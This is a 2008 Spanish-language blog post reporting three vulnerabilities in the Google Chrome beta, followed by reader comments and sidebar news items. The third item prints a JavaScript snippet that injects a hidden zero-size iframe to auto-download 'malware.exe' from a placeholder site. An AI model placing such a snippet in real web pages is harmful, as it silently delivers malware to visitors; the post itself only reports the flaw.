Geek the Planet


Seguridad no image

Published on Septiembre 4th, 2008 | by Angelfire

3

3 vulnerabilidades en google chrome y contando

De estas 3 vulnerabilidades me entero gracias a Dragon.

  1. Vulnerable a carpet bombing, una vulnerabilidad descubierta por el investigador Aviv Raff en el motor web opensource Webkit (Base del navegador Google Chrome y Safari) que permite descargar automáticamente archivos cuando el usuario navega por una página maliciosa.
  2. Fallo en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de pestañas independientes de este navegador.
  3. Consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.
    
    <script>
    document.write('<iframe src="http://tusitio.com/malware.exe" frameborder="0" width="0" height="0">');
    </script>
    

Creo que 3 vulnerabilidades son más que suficientes para demostrar que de momento google Chrome es un desastre absoluto.

Leer Más: Vulnerabilidades en Google Chrome (I)
Vulnerabilidades en Google Chrome (II)
Vulnerabilidades en Google Chrome (III)

Tags: , ,


About the Author

Systems Engineering, Computer Systems Specialist, Social Engineering Specialist. Social Media Analyzer. Usability and SEO enthusiasm (Este es mi perfil de Twitter...)



3 Responses to 3 vulnerabilidades en google chrome y contando

  1. pendiolo says:

    Que parte de BETA http://www.google.com/chrome de esta parte no se lee, aunque google siempre nos acostumbra con sus productos betas, en todo caso, aun no me convence y sigo con FF pero que chrome es BETA y tiene ideas muy innovadoras!

  2. Angelfire says:

    No entiendo su comentario, que tiene que ver con mi post? acaso estoy diciendo que google chrome tenia que ser perfecto? solamente estoy informando sobre las multiples vulnerabilidades del navegador.

  3. Guaguau says:

    La verdad me gusta que sea de google pero no parece un producto de google creo que lo sacaron de afan para luchar contra el IE 8

Back to Top ↑
  • Comentarios recientes

  • Miniposts

    • iOS 8 disponible para descargar

      Hoy se anunció de manera oficial iOS 8, la fecha de llegada será el próximo 17 de septiembre. En iPhonehacks han recopilado los enlaces de descarga directo para los diferentes dispositivos que soportan la nueva versión del sistema operativo. Así que para quienes no desean esperar, ya pueden acceder a la versión Golden Master ...

    • Festigame Colombia 2014

      El festival de videojuegos, cultura gamer y entretenimiento familiar más grande de América Latina ha llegado a nuestro país. Festigame que es un evento creado en Chile en 2012, se ha convertido en el evento anual donde las marcas más importantes de la industria presentan sus últimos productos en el ...

    • Peter Griffin también tiene cuenta en Instagram

      El protagonista de la serie de humor, Padre de Familia, Peter Griffin ha inaugurado su presencia en la red social de fotografía con divertidas fotografías de su vida, y a pesar de ser un personaje de ficción ya ha superado los 200.000 seguidores en tan sólo dos semanas. Son unas fotos bastante divertidas, las ...

    • Manual y documentación de Node.js para Android

      Node.js se ha venido haciendo bastante popular en los últimos años, cada vez son más los usos que como desarrolladores web le damos a esta tecnología. La siguiente aplicación es el manual y la documentación de Node.js, que contiene los siguientes temas: About these Docs Synopsis Assertion Testing Buffer C/C++ Addons Child Processes Cluster Console Crypto Debugger DNS Domain Events File System Globals HTTP HTTPS Modules Net OS Path Process Punycode Query Strings Readline REPL Stream String Decoder Timers TLS/SSL TTY UDP/Datagram URL Utilities VM ZLIB

    • Star Wars Traceroute

      ¿Qué pasa cuando un ingeniero está muy desocupado? pues pasan cosas como esta: Mac y Linux Van a la consola y escriben: traceroute 216.81.59.173 Windows Buscan el CMD y escriben: tracert 216.81.59.173 El resultado es interesante y sorprendente. Si quieren ver la salida de la ejecución del comando, pueden ver el gist Ver más: Beagle Network

  • Comunicados - Notas de Prensa